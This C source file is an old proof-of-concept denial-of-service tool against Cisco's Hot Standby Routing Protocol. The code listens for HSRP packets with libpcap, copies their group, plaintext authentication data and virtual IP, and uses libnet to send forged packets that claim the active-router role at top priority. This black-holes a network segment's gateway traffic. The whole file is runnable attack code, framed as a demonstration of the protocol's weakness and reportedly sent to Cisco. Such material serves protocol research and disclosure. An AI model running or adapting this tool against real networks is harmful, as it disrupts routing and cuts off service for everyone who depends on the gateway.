/*
 * Cisco Hot Standby Routing Protocol (HSRP) Denial of Service
 * Written by bashis @ [EFnet/IRCnet/bash@wcd.se ], U may use it freely.
 *
 * My intention of this code is to show how weak HSRP protocol is.
 *
 * Description:
 * This code listen for any HSRP packet, when it hear one HSRP packet,
 * it capture this, modifies some of HSRP protocol parameters, and send out
 * a fake HSRP packet that tells other routers that I am the active router,
 * I have highest priority and you should be 'Standby' or silent..
 *
 * If the other active, and legal router has highest possible
 * priority (255), then they will fight.. ;-) , AND it seems
 * in my tests that the legal router who 'wishes' be active router,
 * IS allready active, so no DoS will occure. (only UDP flood from both)
 *
 * This code requires libpcap and libnet.
 * ftp://ftp.ee.lbl.gov/libpcap.tar.Z
 * http://www.packetfactory.net/Projects/Libnet/dist/libnet.tar.gz
 *
 * 2001-04-16: cleanup.
 * 2001-04-14: first version. (posted to Cisco)
 *
 */

#include <stdio.h>
#include <string.h>
#include <pcap.h>
#include <libnet.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define HSRP_PORT	1985

struct ip_header
{
#if (BYTE_ORDER == LITTLE_ENDIAN)
	u_char ip_hl:4,
	ip_v:4;
#endif
#if (BYTE_ORDER == BIG_ENDIAN)
	u_char ip_v:4,
	ip_hl:4;
#endif
	u_char ip_tos;
	u_short ip_len;
	u_short ip_id;
	u_short ip_off;
	u_char ip_ttl;
	u_char ip_p;
	u_short ip_sum;
	struct in_addr ip_src;
	struct in_addr ip_dst;
};

struct udp_header
{
	u_short uh_sport;
	u_short uh_dport;
	u_short uh_ulen;
	u_short uh_sum;
};

struct eth_ii
{
	u_char	d_mac[6];
	u_char	s_mac[6];
	u_short	type;
};


/* Multicast to 224.0.0.2, UDP/1985 */
struct hsrp_packet
{
	u_char  version;
	u_char  opcode;
	u_char  state;
	u_char  hellotime;
	u_char  holdtime;
 	u_char  priority;
 	u_char  group;
 	u_char  reserved;
	u_char  auth_data[8];
	u_char	virt_ip_addr[4];
};


struct pcap_pkthdr pkthdr;
struct eth_ii *mac;
struct ip_header *ip_h;
struct udp_header *udp_h;
struct hsrp_packet *hsrp_p;
struct libnet_link_int *network;
struct in_addr src_ip;

int main(int argc, char **argv)
{
	pcap_t *p_desc;
	u_char *h_packet;
	u_char blackhole[1024];
	const u_char *packet;
	char *device;
	char errbuf[PCAP_ERRBUF_SIZE];
	char source_mac[] = {0x0, 0x0, 0xc, 0xac, 0xac, 0xac};
	int packet_size, blackhole_size, c, i;
	int verbose = 1;

	printf("Cisco HSRP DoS, by bashis @ [EFnet/IRCnet/bash@wcd.se]\n");
	printf("My intention of this code is to show how weak HSRP protocol is.\n\n");

	if(getuid() && geteuid()) {
		printf("Well, root.. you know him?\n");
		exit(1);
 	}

	if(argc != 2) {
		printf("Usage: %s <any ip-address>\n  e.g: %s 127.0.0.1\n", argv[0],argv[0]);
		exit(1);
	}

	inet_aton(argv[1],&src_ip);

	if(!(device = pcap_lookupdev(errbuf))) {
		printf("pcap: %s\n",errbuf);
		exit(1);
	}

	if(!(p_desc = pcap_open_live(device, 62, 1, -1, errbuf)))
	{
		printf("pcap: Can't open %s: %s.\n", device, errbuf);
		exit(1);
	}

	for(;;) /* black hole loop */
	{
		packet = pcap_next(p_desc, &pkthdr);
			if(!packet)
				continue;

		ip_h = (struct ip_header *) ((u_char *)packet+14);
			if(ip_h->ip_p != IPPROTO_UDP)
				continue;

		udp_h = (struct udp_header *)((u_char *)packet+34);

		/*
		 * Act only on udp port 1985,
		 * dest ip 224.0.0.2 and do NOT act on my own ip ;-)
		 *
		 */
		if( (udp_h->uh_dport == 0xc107) && 
		!(strncmp(inet_ntoa(ip_h->ip_dst),"224.0.0.2",9)) && 
		(strncmp(inet_ntoa(ip_h->ip_src),argv[1],strlen(argv[1]))) )
		{

		/* Whe want to use the virtual MAC address later */
		mac = (struct eth_ii *) ((u_char *)packet);

		/* Whe need some HSRP values later */
		hsrp_p = (struct hsrp_packet *)((u_char *)packet+42);

		if(verbose)
		printf("\nGroup: %d, Authentication: %s, Virtual IP address: %d.%d.%d.%d\n",
		hsrp_p->group,hsrp_p->auth_data,hsrp_p->virt_ip_addr[0],hsrp_p->virt_ip_addr[1],hsrp_p->virt_ip_addr[2],hsrp_p->virt_ip_addr[3]);

		if(verbose)
		switch(hsrp_p->state) {
			case 0x04: /* speak */
				printf("%s is trying to be active.. (Priority: %d)\n",inet_ntoa(ip_h->ip_src),hsrp_p->priority);
				break;
			case 0x08: /* standby */
				printf("%s is standby router.. (Priority: %d)\n",inet_ntoa(ip_h->ip_src),hsrp_p->priority);
				break;
			case 0x10: /* active */
				printf("%s is active router.. (Priority: %d)\n",inet_ntoa(ip_h->ip_src),hsrp_p->priority);
				break;
			default:
				break;
		} /* end switch */
			
		/*
		 * Lets use some values that we disected from a HSRP packet
		 * before, and set some values so whe are the active router.
		 */

		memset(blackhole, 0, sizeof(blackhole));
		blackhole[0] = hsrp_p->version;
		blackhole[1] = 0x00;	/* Hello.. */
		blackhole[2] = 0x10;	/* ..I am the active router! */
		blackhole[3] = hsrp_p->hellotime;
		blackhole[4] = hsrp_p->holdtime;
		blackhole[5] = 0xff;	/* I have highest priority! */
		blackhole[6] = hsrp_p->group;	/* Your group is my group */
		blackhole[7] = hsrp_p->reserved;
		for(i=0;i<8;i++) /* No matter what authentication you have */
			blackhole[8+i] = hsrp_p->auth_data[i];
		for(i=0;i<4;i++)	/* Welcome to the black hole Gateway */
			blackhole[16+i] = hsrp_p->virt_ip_addr[i];
		blackhole_size = 20; /* HSRP packet is 20 bytes */

		packet_size=LIBNET_IP_H+LIBNET_ETH_H+LIBNET_UDP_H+blackhole_size;

		/*
		 * Build and send out the fake HSRP packet.
		 */

		if (!(network = libnet_open_link_interface(device, errbuf)))
			libnet_error(LIBNET_ERR_FATAL, "libnet: Can't open %s: %s\n", device,  errbuf);

		if (libnet_init_packet(packet_size, &h_packet) == -1)
	 		libnet_error(LIBNET_ERR_FATAL, "libnet: Init of packet failed\n");
 	
		if (libnet_build_ethernet(mac->d_mac,source_mac,ETHERTYPE_IP,NULL,0,h_packet) == -1)
			libnet_error(LIBNET_ERR_FATAL, "libnet: Can't create ethernet packet\n");

		if (libnet_build_ip(LIBNET_UDP_H+blackhole_size,0,0,0,2,IPPROTO_UDP,
		src_ip.s_addr,ip_h->ip_dst.s_addr,NULL,0,h_packet + LIBNET_ETH_H) == -1)
			libnet_error(LIBNET_ERR_FATAL, "libnet: Can't create IP packet\n");

		if (libnet_build_udp(HSRP_PORT,HSRP_PORT,blackhole,
		blackhole_size,h_packet + LIBNET_ETH_H + LIBNET_IP_H) == -1)
			libnet_error(LIBNET_ERR_FATAL, "libnet: Can't create UDP packet\n");
	
		if (libnet_do_checksum(h_packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + blackhole_size) == -1)
			libnet_error(LIBNET_ERR_FATAL, "libnet: UDP checksum failed\n");

		if (libnet_do_checksum(h_packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1)
			libnet_error(LIBNET_ERR_FATAL, "libnet: IP checksum failed\n");

		if(libnet_write_link_layer(network, device, h_packet, packet_size) < packet_size)
			libnet_error(LN_ERR_WARNING, "libnet: Wrote only %d bytes, should written %d bytes\n",c,packet_size);

		if (libnet_close_link_interface(network) == -1)
			libnet_error(LN_ERR_WARNING, "libnet: Couldn't close the interface\n");

		libnet_destroy_packet(&h_packet);


		} /* end if() HSRP packet */

	} /* end for() black hole loop */

	pcap_close(p_desc);
	exit(0);

} /* end main */
